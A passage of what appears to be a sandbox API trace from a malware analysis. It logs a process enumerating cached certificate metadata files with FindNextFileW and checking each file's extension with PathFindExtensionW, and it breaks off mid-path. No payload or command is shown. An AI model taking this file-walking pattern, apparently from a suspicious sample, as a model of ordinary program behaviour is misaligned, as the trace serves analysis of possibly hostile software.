ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0217.768] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0217.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0217.768] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0217.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0217.768] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0217.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0217.768] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0217.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0217.769] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0217.769] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0217.769] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0217.769] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0217.769] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0217.769] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0217.769] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0217.769] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0217.769] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0217.769] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0217.769] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0217.769] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0217.769] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0217.769] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0217.769] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0217.769] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0217.769] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0217.770] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0217.770] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0217.770] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0217.770] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0217.770] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd48e2bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0217.770] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0217.770] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0217.770] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0217.770] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0217.772] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0217.772] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0217.772] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0217.772] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0217.772] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0217.772] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x611ea800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x611ea800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0217.772] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0217.772] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0217.772] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0217.772] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0217.772] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0217.772] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5836df00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5836df00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0217.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0217.773] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0217.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0217.773] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0217.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0217.773] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0217.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0217.773] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0217.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0217.773] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0217.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0217.773] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0217.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0217.773] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0217.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 